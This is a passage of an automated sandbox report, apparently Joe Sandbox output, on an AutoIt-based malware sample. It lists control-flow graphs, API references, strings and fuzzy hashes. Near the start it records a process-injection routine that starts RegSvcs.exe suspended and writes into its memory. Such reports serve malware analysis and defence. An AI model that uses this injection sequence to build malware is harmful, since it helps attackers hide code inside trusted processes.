100037a0 call 10006aa1 448->452 453 10001d76-10001df2 448->453 465 10001ea5-10001eb3 call 10001c10 449->465 466 10001e66 449->466 454 10001e0c-10001e13 450->454 455 10001e1d-10001e23 call 100062c2 450->455 452->453 453->447 454->455 468 10001e15-10001e19 454->468 455->449 456->439 459 10002293 456->459 459->434 465->375 472 10001eb5-10001eb7 465->472 466->370 468->455 472->375 473 10001eb9 472->473 474 10001ec0-10001eec call 10001950 call 10006275 Sleep 473->474 474->375 479 10001eee-10001ef1 474->479 479->375 479->474
                                                                                                      APIs
                                                                                                        • Part of subcall function 10001950: _rand.LIBCMT ref: 1000196E
                                                                                                        • Part of subcall function 10001950: Sleep.KERNELBASE(?,00000000,00000000,?), ref: 10001982
                                                                                                        • Part of subcall function 10001950: CreateProcessA.KERNELBASE(C:/Windows/Microsoft.NET/Framework/v2.0.50727/RegSvcs.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,00000000,?), ref: 100019BC
                                                                                                        • Part of subcall function 10001950: _rand.LIBCMT ref: 100019CA
                                                                                                        • Part of subcall function 10001950: Sleep.KERNELBASE ref: 100019DE
                                                                                                        • Part of subcall function 10001950: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 100019EF
                                                                                                        • Part of subcall function 10001950: Wow64GetThreadContext.KERNEL32(?,00000000), ref: 10001A04
                                                                                                        • Part of subcall function 10001950: ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 10001A27
                                                                                                        • Part of subcall function 10001950: VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 10001A3D
                                                                                                        • Part of subcall function 10001950: WriteProcessMemory.KERNELBASE(?,00000000,0000001C,?,00000000), ref: 10001A50
                                                                                                      • _rand.LIBCMT ref: 10001E80
                                                                                                      • Sleep.KERNELBASE(?,?,c:/windows/SysWOW64/attrib.exe,?,?,?,?,?,?,?,C:/Windows/Microsoft.NET/Framework/v4.0.30319/RegSvcs.exe,?,?,?,c:/windows/SysWOW64/attrib.exe), ref: 10001E94
                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 1000207B
                                                                                                      • _rand.LIBCMT ref: 100020A0
                                                                                                      • Sleep.KERNEL32(?,?,C:/Windows/Microsoft.NET/Framework/v4.0.30319/RegSvcs.exe,?,?,?,?,?,?,?,?,?,?,?,?,C:/Windows/Microsoft.NET/Framework/v4.0.30319/RegSvcs.exe), ref: 100020B4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Sleep_rand$Process$AllocMemoryVirtual$ContextCreateIos_base_dtorReadThreadWow64Writestd::ios_base::_
                                                                                                      • String ID: C:/Windows/Microsoft.NET/Framework/v2.0.50727/RegSvcs.exe$C:/Windows/Microsoft.NET/Framework/v4.0.30319/RegSvcs.exe$c:/windows/SysWOW64/attrib.exe
                                                                                                      • API String ID: 668674759-4116128331
                                                                                                      • Opcode ID: 7b441e1da73d6cd237efcd88e4bcdb29a9249c9463d4ff83562ef02bd56b28ee
                                                                                                      • Instruction ID: 925edf835959b1908ad2a1ce0b2549923147be4e242c24e0c7df4de855264d57
                                                                                                      • Opcode Fuzzy Hash: 7b441e1da73d6cd237efcd88e4bcdb29a9249c9463d4ff83562ef02bd56b28ee
                                                                                                      • Instruction Fuzzy Hash: FB02B674E01268CFEB11CF68C884B9DBBB5FF49340F1141AAE849AB255DB71AE84CF51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00D135DE
                                                                                                      • RegisterClassExW.USER32(00000030), ref: 00D13608
                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D13619
                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00D13636
                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D13646
                                                                                                      • LoadIconW.USER32(000000A9), ref: 00D1365C
                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D1366B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                      • Opcode ID: 6ddccc2356499ccb1f119e7d939a30aa72c3a4e0b86bfafc3a91511e46b30898
                                                                                                      • Instruction ID: 96f6656bde2e87dd4e731eabb443895da71f30d3afc5c32b4116061a52aae65f
                                                                                                      • Opcode Fuzzy Hash: 6ddccc2356499ccb1f119e7d939a30aa72c3a4e0b86bfafc3a91511e46b30898
                                                                                                      • Instruction Fuzzy Hash: C82102B4941348AFDB00AFA4EC89AEDBBB9FB09700F00511AF512EA3A0D7B445408FA4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 612 d509fb-d50a2b call d507cf 615 d50a46-d50a52 call d455b1 612->615 616 d50a2d-d50a38 call d3f656 612->616 622 d50a54-d50a69 call d3f656 call d3f669 615->622 623 d50a6b-d50ab4 call d5073a 615->623 621 d50a3a-d50a41 call d3f669 616->621 633 d50d1d-d50d23 621->633 622->621 631 d50ab6-d50abf 623->631 632 d50b21-d50b2a GetFileType 623->632 635 d50af6-d50b1c GetLastError call d3f633 631->635 636 d50ac1-d50ac5 631->636 637 d50b73-d50b76 632->637 638 d50b2c-d50b5d GetLastError call d3f633 CloseHandle 632->638 635->621 636->635 641 d50ac7-d50af4 call d5073a 636->641 639 d50b7f-d50b85 637->639 640 d50b78-d50b7d 637->640 638->621 649 d50b63-d50b6e call d3f669 638->649 645 d50b89-d50bd7 call d454fa 639->645 646 d50b87 639->646 640->645 641->632 641->635 655 d50be7-d50c0b call d504ed 645->655 656 d50bd9-d50be5 call d5094b 645->656 646->645 649->621 661 d50c0d 655->661 662 d50c1e-d50c61 655->662 656->655 663 d50c0f-d50c19 call d48a3e 656->663 661->663 665 d50c63-d50c67 662->665 666 d50c82-d50c90 662->666 663->633 665->666 668 d50c69-d50c7d 665->668 669 d50c96-d50c9a 666->669 670 d50d1b 666->670 668->666 669->670 671 d50c9c-d50ccf CloseHandle call d5073a 669->671 670->633 674 d50cd1-d50cfd GetLastError call d3f633 call d456c3 671->674 675 d50d03-d50d17 671->675 674->675 675->670
                                                                                                      APIs
                                                                                                        • Part of subcall function 00D5073A: CreateFileW.KERNELBASE(00000000,00000000,?,00D50AA4,?,?,00000000,?,00D50AA4,00000000,0000000C), ref: 00D50757
                                                                                                      • GetLastError.KERNEL32 ref: 00D50B0F
                                                                                                      • __dosmaperr.LIBCMT ref: 00D50B16
                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00D50B22
                                                                                                      • GetLastError.KERNEL32 ref: 00D50B2C
                                                                                                      • __dosmaperr.LIBCMT ref: 00D50B35
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D50B55
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00D50C9F
                                                                                                      • GetLastError.KERNEL32 ref: 00D50CD1
                                                                                                      • __dosmaperr.LIBCMT ref: 00D50CD8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                      • String ID: H
                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                      • Opcode ID: d5c8cf906c9bd02930a0e08ad0950bf7302ae783d6a8b6603e12613ce332652a
                                                                                                      • Instruction ID: 6c4ed54dc053daa2447296d9a15257c7d1d6c2460c494ca516664e8276719d86
                                                                                                      • Opcode Fuzzy Hash: d5c8cf906c9bd02930a0e08ad0950bf7302ae783d6a8b6603e12613ce332652a
                                                                                                      • Instruction Fuzzy Hash: 5AA11532A002489FDF19AF68D892BAD7BA0EF06325F180159FC11DB3A1D7309906CB71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00D54B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00D15539
                                                                                                        • Part of subcall function 00D151BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D151E1
                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00D1534B
                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D54BD7
                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00D54C18
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00D54C5A
                                                                                                      • _wcslen.LIBCMT ref: 00D54CC1
                                                                                                      • _wcslen.LIBCMT ref: 00D54CD0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                      • API String ID: 98802146-2727554177
                                                                                                      • Opcode ID: 49780c1760a1135ad6660d6a3fb30d61286fc53e4ea7e81b8b6ec6376a2c16d4
                                                                                                      • Instruction ID: 94dfb2ba09bcbdbfa7a5d2afaaa800cd5e89aea4b9e23096195b4958e7c70212
                                                                                                      • Opcode Fuzzy Hash: 49780c1760a1135ad6660d6a3fb30d61286fc53e4ea7e81b8b6ec6376a2c16d4
                                                                                                      • Instruction Fuzzy Hash: 68714B71505341AEC710EF65E885DAABBE8EF99350F40042EF845C72A1EF719A88CB72
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00D13465
                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00D13474
                                                                                                      • LoadIconW.USER32(00000063), ref: 00D1348A
                                                                                                      • LoadIconW.USER32(000000A4), ref: 00D1349C
                                                                                                      • LoadIconW.USER32(000000A2), ref: 00D134AE
                                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D134C6
                                                                                                      • RegisterClassExW.USER32(?), ref: 00D13517
                                                                                                        • Part of subcall function 00D135AB: GetSysColorBrush.USER32(0000000F), ref: 00D135DE
                                                                                                        • Part of subcall function 00D135AB: RegisterClassExW.USER32(00000030), ref: 00D13608
                                                                                                        • Part of subcall function 00D135AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D13619
                                                                                                        • Part of subcall function 00D135AB: InitCommonControlsEx.COMCTL32(?), ref: 00D13636
                                                                                                        • Part of subcall function 00D135AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D13646
                                                                                                        • Part of subcall function 00D135AB: LoadIconW.USER32(000000A9), ref: 00D1365C
                                                                                                        • Part of subcall function 00D135AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D1366B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                      • API String ID: 423443420-4155596026
                                                                                                      • Opcode ID: e5d0b08f538f44501befa82a957ecef8c250247f190846b7f415228be7bdc57e
                                                                                                      • Instruction ID: 2d002c55cb92709aa96eef336eeecd339468eb8d636a3e9ed527e44931275701
                                                                                                      • Opcode Fuzzy Hash: e5d0b08f538f44501befa82a957ecef8c250247f190846b7f415228be7bdc57e
                                                                                                      • Instruction Fuzzy Hash: 64212C70D40398ABDB10AFA5EC95AAD7FB9FB48B50F00401EE605EA3A0D7B955458FA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 753 d13696-d136ab 754 d1370b-d1370d 753->754 755 d136ad-d136b0 753->755 754->755 758 d1370f 754->758 756 d13711 755->756 757 d136b2-d136b9 755->757 760 d13717-d1371c 756->760 761 d53dce-d53df6 call d12f24 call d2f1c6 756->761 762 d1378b-d13793 PostQuitMessage 757->762 763 d136bf-d136c4 757->763 759 d136f6-d136fe DefWindowProcW 758->759 769 d13704-d1370a 759->769 764 d13743-d1376a SetTimer RegisterWindowMessageW 760->764 765 d1371e-d13721 760->765 799 d53dfb-d53e02 761->799 770 d1373f-d13741 762->770 766 d136ca-d136ce 763->766 767 d53e3b-d53e4f call d7c80c 763->767 764->770 773 d1376c-d13777 CreatePopupMenu 764->773 771 d13727-d13735 KillTimer call d1388e 765->771 772 d53d6f-d53d72 765->772 774 d13795-d1379f call d2fcbb 766->774 775 d136d4-d136d9 766->775 767->770 793 d53e55 767->793 770->769 789 d1373a call d1572c 771->789 778 d53d74-d53d78 772->778 779 d53daa-d53dc9 MoveWindow 772->779 773->770 786 d137a4 774->786 781 d53e20-d53e27 775->781 782 d136df-d136e4 775->782 787 d53d99-d53da5 SetFocus 778->787 788 d53d7a-d53d7d 778->788 779->770 781->759 790 d53e2d-d53e36 call d71367 781->790 791 d13779-d13789 call d137a6 782->791 792 d136ea-d136f0 782->792 786->770 787->770 788->792 795 d53d83-d53d94 call d12f24 788->795 789->770 790->759 791->770 792->759 792->799 793->759 795->770 799->759 800 d53e08-d53e1b call d1388e call d138f2 799->800 800->759
                                                                                                      APIs
                                                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00D13690,?,?), ref: 00D136FE
                                                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00D13690,?,?), ref: 00D1372A
                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D1374D
                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00D13690,?,?), ref: 00D13758
                                                                                                      • CreatePopupMenu.USER32 ref: 00D1376C
                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00D1378D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                      • String ID: TaskbarCreated
                                                                                                      • API String ID: 129472671-2362178303
                                                                                                      • Opcode ID: bc1d8a3332dbfd1425c4d2f7866426171e763b0b700484d111c682cd325e1bba
                                                                                                      • Instruction ID: e286f6ba43b00e433fd15f24aa52bb2d7c89c9acab28d947440ca8222256bd27
                                                                                                      • Opcode Fuzzy Hash: bc1d8a3332dbfd1425c4d2f7866426171e763b0b700484d111c682cd325e1bba
                                                                                                      • Instruction Fuzzy Hash: 9841E7B1144284B7DB286B78BC4ABF9366DE701350F180129F956CA3D1DEB5DF84CA71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 809 d12a52-d12a8b 810 d12a91-d12aa7 mciSendStringW 809->810 811 d539f4-d539f5 DestroyWindow 809->811 812 d12d08-d12d15 810->812 813 d12aad-d12ab5 810->813 814 d53a00-d53a0d 811->814 816 d12d17-d12d32 UnregisterHotKey 812->816 817 d12d3a-d12d41 812->817 813->814 815 d12abb-d12aca call d12e70 813->815 818 d53a3c-d53a43 814->818 819 d53a0f-d53a12 814->819 830 d12ad0-d12ad8 815->830 831 d53a4a-d53a56 815->831 816->817 821 d12d34-d12d35 call d12712 816->821 817->813 822 d12d47 817->822 818->814 827 d53a45 818->827 823 d53a14-d53a1c call d17953 819->823 824 d53a1e-d53a21 FindClose 819->824 821->817 822->812 829 d53a27-d53a34 823->829 824->829 827->831 829->818 833 d53a36-d53a37 call d83c0b 829->833 834 d53a6e-d53a7b 830->834 835 d12ade-d12b03 call d1e650 830->835 836 d53a60-d53a67 831->836 837 d53a58-d53a5a FreeLibrary 831->837 833->818 838 d53aa2-d53aa9 834->838 839 d53a7d-d53a9a VirtualFree 834->839 847 d12b05 835->847 848 d12b3a-d12b45 OleUninitialize 835->848 836->831 842 d53a69 836->842 837->836 838->834 844 d53aab 838->844 839->838 843 d53a9c-d53a9d call d83c71 839->843 842->834 843->838 849 d53ab0-d53ab4 844->849 851 d12b08-d12b38 call d13047 call d12ff0 847->851 848->849 850 d12b4b-d12b50 848->850 849->850 854 d53aba-d53ac0 849->854 852 d53ac5-d53ad2 call d83c45 850->852 853 d12b56-d12b60 850->853 851->848 867 d53ad4 852->867 856 d12b66-d12b71 call d1bd2c 853->856 857 d12d49-d12d56 call d2fb27 853->857 854->850 869 d12b77 call d12f86 856->869 857->856 870 d12d5c 857->870 871 d53ad9-d53afb call d3015d 867->871 872 d12b7c-d12be7 call d12e17 call d301a4 call d12dbe call d1bd2c call d1e650 call d12e40 call d301a4 869->872 870->857 877 d53afd 871->877 872->871 899 d12bed-d12c11 call d301a4 872->899 880 d53b02-d53b24 call d3015d 877->880 886 d53b26 880->886 890 d53b2b-d53b4d call d3015d 886->890 896 d53b4f 890->896 898 d53b54-d53b61 call d76d63 896->898 904 d53b63 898->904 899->880 905 d12c17-d12c3b call d301a4 899->905 907 d53b68-d53b75 call d2bd6a 904->907 905->890 910 d12c41-d12c5b call d301a4 905->910 913 d53b77 907->913 910->898 915 d12c61-d12c85 call d12e17 call d301a4 910->915 917 d53b7c-d53b89 call d83b9f 913->917 915->907 924 d12c8b-d12c93 915->924 923 d53b8b 917->923 926 d53b90-d53b9d call d83c26 923->926 924->917 925 d12c99-d12caa call d1bd2c call d12f4c 924->925 933 d12caf-d12cb7 925->933 931 d53b9f 926->931 934 d53ba4-d53bb1 call d83c26 931->934 933->926 935 d12cbd-d12ccb 933->935 940 d53bb3 934->940 935->934 937 d12cd1-d12d07 call d1bd2c * 3 call d12eb8 935->937 940->940
                                                                                                      APIs
                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D12A9B
                                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 00D12B3A
                                                                                                      • UnregisterHotKey.USER32(?), ref: 00D12D1F
                                                                                                      • DestroyWindow.USER32(?), ref: 00D539F5
                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00D53A5A
                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D53A87
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                      • String ID: close all
                                                                                                      • API String ID: 469580280-3243417748
                                                                                                      • Opcode ID: c86e520de6d8f8c8d27d9e21bff42a51361e9105f96268cc7b3e6f8be926e902
                                                                                                      • Instruction ID: 93df4e4fea8f1bf5b54d9e326a0818d798848d6e88e42599a64413ae5954b828
                                                                                                      • Opcode Fuzzy Hash: c86e520de6d8f8c8d27d9e21bff42a51361e9105f96268cc7b3e6f8be926e902
                                                                                                      • Instruction Fuzzy Hash: D7D16A317012129FCB19EF14E495AA9F7A1FF05741F14419DE88AAB252CB31ED66CFB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 948 d490d5-d490e5 949 d490e7-d490fa call d3f656 call d3f669 948->949 950 d490ff-d49101 948->950 967 d49481 949->967 952 d49107-d4910d 950->952 953 d49469-d49476 call d3f656 call d3f669 950->953 952->953 956 d49113-d4913e 952->956 972 d4947c call d42b7c 953->972 956->953 959 d49144-d4914d 956->959 962 d49167-d49169 959->962 963 d4914f-d49162 call d3f656 call d3f669 959->963 965 d49465-d49467 962->965 966 d4916f-d49173 962->966 963->972 969 d49484-d49489 965->969 966->965 971 d49179-d4917d 966->971 967->969 971->963 974 d4917f-d49196 971->974 972->967 977 d491b3-d491bc 974->977 978 d49198-d4919b 974->978 981 d491be-d491d5 call d3f656 call d3f669 call d42b7c 977->981 982 d491da-d491e4 977->982 979 d491a5-d491ae 978->979 980 d4919d-d491a3 978->980 985 d4924f-d49269 979->985 980->979 980->981 1012 d4939c 981->1012 983 d491e6-d491e8 982->983 984 d491eb-d49209 call d43bb0 call d42d58 * 2 982->984 983->984 1021 d49226-d4924c call d497b4 984->1021 1022 d4920b-d49221 call d3f669 call d3f656 984->1022 987 d4933d-d49346 call d4fc3b 985->987 988 d4926f-d4927f 985->988 999 d49348-d4935a 987->999 1000 d493b9 987->1000 988->987 991 d49285-d49287 988->991 991->987 997 d4928d-d492b3 991->997 997->987 1002 d492b9-d492cc 997->1002 999->1000 1004 d4935c-d4936b GetConsoleMode 999->1004 1008 d493bd-d493d5 ReadFile 1000->1008 1002->987 1006 d492ce-d492d0 1002->1006 1004->1000 1011 d4936d-d49371 1004->1011 1006->987 1013 d492d2-d492fd 1006->1013 1009 d493d7-d493dd 1008->1009 1010 d49431-d4943c GetLastError 1008->1010 1009->1010 1017 d493df 1009->1017 1015 d49455-d49458 1010->1015 1016 d4943e-d49450 call d3f669 call d3f656 1010->1016 1011->1008 1018 d49373-d4938d ReadConsoleW 1011->1018 1019 d4939f-d493a9 call d42d58 1012->1019 1013->987 1020 d492ff-d49312 1013->1020 1028 d49395-d4939b call d3f633 1015->1028 1029 d4945e-d49460 1015->1029 1016->1012 1024 d493e2-d493f4 1017->1024 1026 d493ae-d493b7 1018->1026 1027 d4938f GetLastError 1018->1027 1019->969 1020->987 1031 d49314-d49316 1020->1031 1021->985 1022->1012 1024->1019 1034 d493f6-d493fa 1024->1034 1026->1024 1027->1028 1028->1012 1029->1019 1031->987 1038 d49318-d49338 1031->1038 1041 d49413-d4941e 1034->1041 1042 d493fc-d4940c call d48df1 1034->1042 1038->987 1048 d49420 call d48f41 1041->1048 1049 d4942a-d4942f call d48c31 1041->1049 1053 d4940f-d49411 1042->1053 1054 d49425-d49428 1048->1054 1049->1054 1053->1019 1054->1053
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 942007e1df18d0d8cc1d9fd2ad729b8b1f417b40f9167390d990cb7df6be7ec4
                                                                                                      • Instruction ID: d8924c4d00990b6b345fe9a38435c935540dffe4814e586f79e5d214d8c5820d
                                                                                                      • Opcode Fuzzy Hash: 942007e1df18d0d8cc1d9fd2ad729b8b1f417b40f9167390d990cb7df6be7ec4
